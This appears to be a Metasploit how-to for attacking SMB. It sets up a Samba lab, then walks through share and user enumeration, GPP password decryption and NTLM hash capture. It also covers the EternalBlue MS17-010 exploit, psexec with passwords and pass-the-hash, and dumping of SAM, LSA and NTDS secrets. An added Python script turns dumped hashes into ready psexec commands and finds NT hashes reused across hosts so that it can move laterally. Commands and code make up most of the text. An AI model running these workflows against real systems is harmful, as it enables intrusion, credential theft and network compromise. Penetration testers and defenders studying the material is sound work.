
SMB Workflows

SMB (Server Message Block) is a protocol for sharing files, printers and other resources between nodes on a network.

There are two main ports for SMB:

  • 139/TCP - Initially Microsoft implemented SMB on top of its existing NetBIOS network architecture, which allowed Windows computers on the same network to communicate
  • 445/TCP - Newer versions of SMB run directly over TCP on this port, where NetBIOS is not used.

Other terminology to be aware of:

  • SMB - Server Message Block
  • CIFS - Common Internet File System
  • Samba - A free software re-implementation of SMB, which is frequently found on Unix-like systems

Metasploit has support for multiple SMB modules, including:

  • Version enumeration
  • Verifying/bruteforcing credentials
  • Capture modules
  • Relay modules
  • File transfer
  • Exploit modules

There are more modules than listed here; for the full list of SMB modules run the search command within msfconsole:

msf6 > search smb

Lab Environment

When testing in a lab environment, SMB can be run on a Windows host machine, or within Docker.

For instance, running Samba on Ubuntu 16.04 (publishing the two SMB ports listed above so Metasploit can reach the container):

docker run -it --rm --publish 139:139 --publish 445:445 ubuntu:16.04 /bin/bash
mkdir -p /tmp/foo
apt update
apt install -y samba

Verify the version is as expected:

$ samba --version
Version 4.3.11-Ubuntu

Configuring the share (the section name, foo here, is the share name clients will see):

cat << EOF >> /etc/samba/smb.conf
[foo]
    comment = Foo samba share
    path = /tmp/foo
    read only = no
    browsable = yes
EOF

Restart the service:

service smbd restart

SMB Enumeration

Enumerate SMB version:

use auxiliary/scanner/smb/smb_version
run smb://

Enumerate shares:

use auxiliary/scanner/smb/smb_enumshares
run smb://
run smb://user:pass@
run 'smb://domain;user with spaces:pass@' SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1

Enumerate shares and show all files recursively:

use auxiliary/scanner/smb/smb_enumshares
run 'smb://user:pass with a space@' showfiles=true spidershares=true

Enumerate users:

use auxiliary/scanner/smb/smb_enumusers
run smb://user:p4$$w0rd@

Enumerate Group Policy Preferences (GPP) files in an SMB share; these can contain cpassword values, which the module decrypts using the AES key Microsoft published (MS14-025):

use auxiliary/scanner/smb/smb_enum_gpp
run smb:// verbose=true store=true
run smb://user:p4$$w0rd@ verbose=true store=true

SMB Server

Create a mock SMB server which accepts any authentication attempt, records the client's NTLM challenge-response (NetNTLMv1/v2) hashes, and then returns NT_STATUS_LOGON_FAILURE. The captured values can be cracked offline later (the JOHNPWFILE option writes them in john/hashcat format); note that they are challenge-responses, not NT hashes, so they cannot be replayed for pass-the-hash:

use auxiliary/server/capture/smb

SMB MS17-010

Metasploit has a module for MS17-010, the SMBv1 vulnerability exploited by EternalBlue, which can target Windows 7, Windows 8.1, Windows Server 2012 R2, and Windows 10.

Checking for exploitability:

use auxiliary/scanner/smb/smb_ms17_010
check smb://user:pass@
check smb://domain;user:pass@
check cidr:/24:smb://user:pass@ threads=32

As of 2021, Metasploit ships a single EternalBlue exploit module covering Windows 7, Windows 8.1, Windows Server 2012 R2 and Windows 10; full details are in the Metasploit Wrap-up:

use exploit/windows/smb/ms17_010_eternalblue
run lhost=
run lhost= lport=5000
run smb://user:pass@ lhost=
run smb://domain;user:pass@ lhost=

SMB psexec

Running psexec against a remote host with credentials:

use exploit/windows/smb/psexec
run smb://user:pass8@ lhost= lport=5000

Running psexec with NTLM hashes (pass-the-hash). The password is given as LMHASH:NTHASH; aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, which is what Windows stores when LM hash storage is disabled (the default since Vista), so only the NT hash matters:

use exploit/windows/smb/psexec
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6@ lhost= lport=5000

SMB Dumping

Dumping secrets (SAM hashes, LSA secrets and, against a domain controller, NTDS.dit hashes) with credentials:

use auxiliary/gather/windows_secrets_dump
run smb://user:pass@

Dumping secrets with NTLM hashes:

use auxiliary/gather/windows_secrets_dump
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:15feae27e637cb98ffacdf0a840eeb4b@
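The LMHASH:NTHASH form used in the psexec and windows_secrets_dump commands above is the pwdump layout (user:rid:LM:NT:::) that the SAM section of a secrets dump prints. The following is an added example (not Metasploit's own code; the hashes and hosts in it are constructed) that parses such output, skips blank-password accounts, emits the smb:// form psexec takes, and flags NT hashes shared between hosts, which is what makes a dumped local administrator hash useful for moving laterally. It assumes psexec accepts LMHASH:NTHASH in place of a password, as the examples above do.

```python
"""Build pass-the-hash credentials for exploit/windows/smb/psexec from
hashdump-style output. Added example, not Metasploit's own code. Assumes the
pwdump layout  user:rid:LMHASH:NTHASH:::  and the smb://[domain;]user:LM:NT@host
form shown in this page. All hashes and hosts below are constructed.
"""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" (blank password)
_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample dumps from two hosts (not real credentials).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:15feae27e637cb98ffacdf0a840eeb4b:::
corrupt:1002:notahash:15feae27e637cb98ffacdf0a840eeb4b:::
"""
SAMPLE_DUMP_HOST2 = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:9d3a7b6e2c1f4e5d8a0b1c2d3e4f5a6b:::
"""


def parse_hashdump(text):
    """Return [(user, rid, lm, nt)] for well-formed lines, lower-casing the hex.
    Lines that do not match the pwdump layout are skipped rather than guessed at."""
    out = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            out.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return out


def pth_targets(text, host, domain=None):
    """Map user -> smb:// URI usable with psexec, skipping blank-password accounts.
    The LM half is passed through unchanged; NTLMv2 authentication only ever uses
    the NT hash, so the empty-LM value is harmless."""
    creds = {}
    for user, _rid, lm, nt in parse_hashdump(text):
        if nt == EMPTY_NT:
            continue  # blank password: typically a disabled built-in such as Guest
        principal = f"{domain};{user}" if domain else user
        creds[user] = f"smb://{principal}:{lm}:{nt}@{host}"
    return creds


def reused_nt_hashes(dumps):
    """Given {host: dump_text}, return {nt: [(host, user), ...]} for NT hashes seen
    on more than one host: the reuse that lets one dumped hash open the next box."""
    seen = {}
    for host, text in dumps.items():
        for user, _rid, _lm, nt in parse_hashdump(text):
            if nt != EMPTY_NT:
                seen.setdefault(nt, []).append((host, user))
    return {nt: where for nt, where in seen.items() if len({h for h, _ in where}) > 1}


if __name__ == "__main__":
    for user, uri in pth_targets(SAMPLE_DUMP, "10.0.0.5").items():
        print(f"run {uri} lhost= lport=5000")
    print(reused_nt_hashes({"10.0.0.5": SAMPLE_DUMP, "10.0.0.6": SAMPLE_DUMP_HOST2}))
```

The reuse check is the one worth running first after a dump: a local Administrator NT hash that is identical on two hosts is a single psexec command away from the second host, without ever cracking the password.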

SMB Files

Download a file:

use auxiliary/admin/smb/download_file
run smb://a:p4$$w0rd@

Upload a file:

use auxiliary/admin/smb/upload_file
echo "my file" > local_file.txt
run smb://a:p4$$w0rd@ lpath=./local_file.txt